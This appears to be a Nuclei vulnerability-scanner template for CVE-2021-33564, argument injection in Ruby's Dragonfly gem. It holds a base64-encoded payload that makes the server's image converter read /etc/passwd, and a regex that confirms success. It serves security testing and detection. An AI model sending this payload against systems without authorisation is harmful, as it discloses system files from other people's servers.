nuclei-templates/cves/2021/CVE-2021-33564.yaml

24 lines
678 B
YAML

id: CVE-2021-33564
info:
name: Argument Injection in Ruby Dragonfly
author: 0xsapra
severity: critical
reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
tags: cve,cve2021,rce,ruby
requests:
- method: GET
path:
- "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
- "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"